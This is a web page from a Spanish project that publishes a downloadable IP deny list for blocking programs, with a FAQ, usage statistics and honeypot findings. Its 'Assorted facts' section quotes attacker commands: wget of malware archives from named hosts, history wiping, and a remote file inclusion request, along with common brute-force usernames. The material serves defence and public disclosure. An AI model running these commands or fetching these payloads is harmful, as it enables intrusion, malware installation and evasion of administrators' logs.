Ex.1 Ex.2

 Separador

Mission 

We identify, gather and clasify dangerous IP addresses such as:

An updated list is published each 3-4 days, ready to be used with any blocking program. All you need to do is adding it to your favourite program by using one of the URLs below:


Documentation 

How-to English & SpanishEspañol/Castellano e Inglés

PDF document  Peerguardian 2 for Windows     PDF document  IPlist/IPblock 0.26 for Linux

Peerblock: just add a new list and paste http://list.iblocklist.com/lists/atma/atma

 

FAQ

How can I use the blacklist/atma deny list?

Most blocking programs come with a few pre-configured lists. Unfortunately, blacklist/atma is not in that number as far as we know. Thus, you need to configure your blocking program (see above, "how-tos"). While being an easy task in every case, there are no universal instructions valid for all of them. Our list is published in Peerguardian 1 format, which is compatible with nearly all existant programs and human readable "as is". If you are not using a blocking program yet, please go to the downloads section.

Concerning the terms of use, feel free to use it for any purpose as long as you keep the notice in its header (comments in the first lines of the list) or giving credit in any other fair way instead. If in doubt, please contact us.

Why should I use this list when my program of choice already comes with some others preconfigured?

Mainly for a reason alone: we do believe that we identify a good deal of them not listed anywhere else before. This is how we try to do it::

  1. We identify most dangerous IPs with our own tools which are not based in any other. They are supposed to be harder to avoid cause attackers don't know how they work, even if they know about their existance at all. More, they can't know where we are lurking because we use dynamic IPs. In other words, when a threat is detected, the attacker will find its IP published within some 50 hours but we will have changed ours before, so there will be no use for them in reviewing hundreds of logs or warning other attackers.
  2. We are spanish language speakers and we use that language for almost everything we do: websites, mailing, programming... Most attackers either are native english speakers or have very good skills in that language, but it is not very likely that they could understand spanish. That's why they might be detected by us without even knowing how and where it happened.
  3. As for now, we are a small group. If we intend to harvest a large number of attacks we just can not sit and wait for them to appear. Thus, we don't use passive detections but try to attract as many attacks as possible instead (obviously, we can't explain in detail how we do it).

Should I use this list alone or along with some others?

For one thing, the more lists you use, the harder to handle for your computer, which could be a problem if your hardware is old. On the other hand, despite we add IPs from other sources, it is always safer to block them from several lists, perhaps updated more often than Atma, being larger or more specialized. Since Atma is a multipurpose list, we do believe that it is suitable for most home and even professional users, specially those using P2P and/or running any kind of server. For your information, its contents as for March of 2010 were as shown:

Threat: IPs/ranges: Threat: IPs/ranges:
Spammer
Malware
Unspecified Threat
SSH Attack
SMTP Port 25 Attack
P2P Malware
P2P Corrupted Packets
Several Threats
Threat For SQL Servers
Port Scan Attack 		20667
14846
10979
5348
4183
2704
2388
1577
688
554 		Proxy Seeker
Threat For Web Servers
Telnet Attack
MS-Terminal Attack
FTP Attack
P2P Unrequested Responses
VNC Attack
Others

Single IPs blocked:
 476
471
234
191
173
112
68
38

88125

Bear in mind that we don't list IPs:

If you want to block any of them, you definitevely need extra lists.

How does an IP/range get delisted?

All IPs get deleted within 2-5 months, depending on a number of items like the kind of threat and the historical behaviour. Of course, we remove false positives as soon as we get to know about them. As of June of 2010, entries had been in the list since:

IPs/ranges added within: IPs/ranges:
Current month (June)
1-2 months ago (May)
2-3 months ago (April)
3-4 months ago (March)		 40261
21420
21101
213

Will I get rid of antivirus, anty-spyware and firewalls?

Not at all. Using a blocking program along with our list or any other just prevents your computer to contact with some others. That's all. For instance, you still can get your computer infected by sharing a memory card or by opening an infected email, even if delivered by a trustworthy ISP.

Despite already using the Atma list, I am still receiving spam.

Spammers' IPs are targeted by us and included in the list, indeed, and for one reason: those who send spam are very likely to pose some other threats, notably for administrators of servers, forum, blogsm etc. We will never list IPs belonging to the most important providers, like Gmail, Hotmail, Yahoo, etc. Unfortunately, most spam come from accounts of those companies. If you are not satisfied with their own filters and you are using a mail manager, you could try installing a filter in your computer.

Is atma/blacklist a widely used list?

We guess not at all until February of 2010 but we had no other reliable data than those of galinux.myftp.org. As a orientative fact, the list had been downloaded more than 5000 times from there in january of 2010. However, currently is avaliable at iblocklist.com which is, perhaps, the most important mirror for blocking lists.

What do the descriptions mean?

When using a blocking program you will see different kinds of alerts. Those provided from our list fall into three main categories::

Note this: each attack goes towards a specific target, but that doesn't mean that the attacker would refuse to take advantage of unexpected vulneravilities. Same here about operative systems: you could see an "SSH attack" alert and think "well, I'm running Windows, which does not use that stuff, so I'm safe". Wrong. We are saying to you that we have detected a SSH attack from that IP but it is very likey they could run other kinds of attacks.

Some items represent quite benign actions, such as port scans or pinging. On the contrary, those labeled as "Several threats" are the most dangerous.


Assorted facts

 Some SSH attacks:

Gathering information

w
uptime
id
ls -a
uname -a
cat /proc/cpuifno
ps x
wget
curl -O

After a previous succesful login

rm -rf .bash_history
history -c
w
ps x
ls -a

Attempting to get rid of the honeypot

bash
sh
kill -9 -1
reboot
exit 		  Sending malware to the target

uname -a
passwd
wget http://nasa.undernet.nm.ru/udp.tgz
tar zxvf udp.tgz

Other deliveries came from

dragutrau.clan.su/Trade/army.tar.gz
freewebtown.com/hotzu/py/ryo.tar
prigat.ucoz.com/mangalia.tgz

Attackers don't want us to see what they do

unset HISTFILE HISTSAVE HISTLOG WATCH
HISTFILE=/dev/null

Attempting to run malware

cd /dev/shm
su

 Some flashy detections:

Statistics of blocking programs downloading blacklist/atma during the first week of December o2009:

Downloads
760
253
112
43
14
7
4
4
2
1

Total
916
253
14
11
 Program/Version
PeerBlock/1.0.0.181
PeerGuardian/2.0
PeerBlock/1.0.0.202
PeerBlock/1.0.0.223
BlockControl/1.6.9
PeerBlock/0.9.2.86
IPblock/0.18
IPblock/0.27
IPblock/0.26
PeerBlock/1.0.0.187

Program
PeerBlock
PeerGuardian
BlockControl
IPblock

Chart Agents/Versions

 During September of 2009 attackers tried to login under 10374 different user names. The most attacked were:

9850
1034
690
431
264
224
208
206
195
190
 root
admin
test
oracle
user
guest
robert
mysql
michael
paul 		  190
177
176
176
168
166
162
154
152
148
 info
postgres
amanda
adam
sales
martin
backup
student
ftpuser
suporte 		  132
130
130
130
126
126
124
120
115
114
 testing
nagios
eric
david
web
tester
john
richard
sarah
sam 		  114
110
107
106
104
102
101
100
100
100
 patrick
bruce
matt
mark
cyrus
teste
marc
webmaster
mail
download

    Advice: choosing user names in any other language than english is safer. Spanish speakers should avoid "David" (a common name in both languages).

Bad boys never sleep:

2009, fall of the night of the 24th. While many countries are celebrating Christmas Eve, attackers were taking advantage of it. The most striking one detected by us was during that hours was a SSH dictionary attack from 209.44.120.2. It lasted for 8 hours and they tried 20.859 username + password combinations.

2010, July the 7th. While millions are enjoying the Germany vs Spain FIFA World Cup 2010 semi-final, a host in Spain reports a (not actually) succesful SSH dictionary attack:

Jul 7 19:27:42 [void] sshd[28641]: Accepted password for [void] from 76.191.100.182 port 47065 ssh2
Jul 7 20:25:37 [void] sshd[12823]: Accepted password for [void] from 121.189.19.126 port 46649 ssh2
Jul 7 21:17:08 [void] sshd[8048]: Accepted password for [void] from 79.112.214.99 port 1266 ssh2
Jul 7 23:45:48 [void] sshd[28775]: Accepted password for [void] from 221.111.75.119 port 33195 ssh2
Jul 7 23:47:14 [void] sshd[31450]: Accepted password for [void] from 221.111.75.119 port 51866 ssh2
Jul 7 23:53:28 [void] sshd[8496]: Accepted password for [void] from 188.24.255.242 port 30856 ssh2


Wierd ways of figthting cybercrime:

Visit from www.delitosinformaticos.gov.co (Colombian gov. agency "Grupo Investigativo Delitos Informáticos") :

200.93.147.154 - - [17/Feb/2010:13:57:49 +0200] "GET //poll//booth.php?include_path=http://www.iseulbi.com/id1.txt?? HTTP/1.1" 404 613 www.atma.es "-" "Mozilla/5.0" "-"

No comment :D


Get involved 

1-Use and spread our list

Help us and help others letting them to know about us. You could link us from your blog or website, tell your contacts about atma.es... On the other hand, since downloads are steadily increasing, we would like to have the list (it is only 2-3 MB) mirrored in some more sites. If you are willing to setup one, please contact us.

2-Sending your logs to us

We have developed some automathic tools that collect, select, clasify and merge IPs from a variety of logs. If you think that some in your system could help us, please drop us a line. As for now, we can directly use logs from several P2P programs, some models of routers, Linux logs and a handful of other stuff.

3-Reporting assosrted IPs/ranges

If you know how to identify them in a particular context you could report them to us.

4-Run a "honey pot"

You can think of a "honey pot " as a disguise that can turn your local net or computer into an absolutely different thing when seen from an attacker's point of view. Installing a basic one can be quite effective while easy to set up. If you need a little help, here we are!

5-Warn us about false positives, changed IPs, etc.

Sometimes we may be wrong and add some innocent IP to the list. But that is not the only one issue we have to face; for instance, we need to remove old entries when they have turned safe, to exchange lots of info, to deal with lots of emails... We will always welcome your help.

6-Special request for english speakers

This page in english is a draft yet. We would like you to help us by warning us about typos, wrong expressions and so.


Links 

MS Windows Blocking programs for Microsoft Windows

PeerBlock   PeerGuardian   ProtoWall (not open source)   OutPost Pro (not free)   BeeThink IP blocker (not free)

Linux Blocking programs for Linux

IPBlock/IPList   MoBlock   PeerGuardian   NfBlock    EisFair-BFB

Linux Blocking programs for Mac-OS

PeerGuardian

If you know about any other not listed here, please tell us.

Linux Third part sources

In our list we add the newest threats detected by other trustworthy sources to whom we are in debt:

Amos.TwilightParadox.com    Antispam.Andreotti.nl*    Autoshun.org*    Blackip.ustc.edu.cn    Blocklist.de    Boston.comites-it.org    Cats-cradle.org    Cert.ntnu.edu.tw    Check.Torproject.org    ChessPlays.ru    Chriskujawski.com    Clean-mx.de*    Cyber-ta.org    Cs.Rutgers.edu    Danger.rulez.sk    DnsBL.Abuse.ch*    Dynastop.tanaya.net/    Dr-data.net    Elfagr.net    Elite-proxies.blogspot.com    EmergingThreats.net    EvilDayStar.net    EvolutionArts.net    Files.sabmx.net    Faciti.com    ForumPostersUnion.com    Franfremont.com    Fugitif.DynDns.org    Gamble-Irwin-Group.com    Genendesign.com    Gw.Paraibuna.com.br    Hackedreport.com/    Iantighe.com    IPillion.com    Jainvestigation.com    Kikurin.org*    Kish-telecom.com    Lists.evolt.org    Malc0de.com    MaliciousNetworks.org*    MalwareDomainList.com* MalwarePatrol.net    MalwareURL.com    Meganfath.com    Merlot.com    MosHunter.ru    Mtc.sri.com    MyIPtest.com    MyWot.com/wiki    NeilGunton.com    Nethavoc.net    Old-noritake.org    Outten.co.uk    Paradoxi.exisoft.nl    Pellegrinilab.org    PrairieHomeOutfitters.com    Progressiverehabmuskego.com    ProjectHoneyPot.org*    ProSouthRealty.com    Proxyfire.net    Puaga.com    Rblhu.net*    Red-uno.es    Revistamariela.com    Saleaccess.ru    Salemanuf.ru    Sans.org*    Sber2005.ru    Sblam.com    Senderbase.org    Semeliker.net    Shinshu.fm    Slyparadox.com    Smp.rnc.ro    Snortattack.org    Spam-ip.com    sshBL.org*    Stats.denyhosts.net    StopForumSpam.com    Sudosecure.net    Tcc.edu.tw    TheHackedReport.com    Threatexpert.com    Trustedsource.org    Twitter.com/compromised_sys    Twitter.com/HoneyPoint*    Twitter.com/olaf_j*    Uceprotect.net    Univedant.com    Unusualdischarge.com    Ustc.edu.cn    Virbl.bit.nl    VillagePlayers.org    Websworld.org    Xml.SsdSandBox.net    60bPictures.com    192.192.205.93    66.197.202.5   

Note: when you perform a IP/range query, results may include not a generic label but some of the sources labelled with * instead.

Please, note that that we select IPs following our own criteria rather than automatically adding every single one from every single source. That's why you could find IPs that are listed in some of them but missing in the Atma deny list.


Contact 

Visit our Google group (spanish only) or send us an email.

 Separador

© 2008-2010 Atma.es | Legal notice | Original logo from Ocal | Valid HTML and CSS | Web of Trust record | Designed by Expressmedia.es | Hosted with Portal-On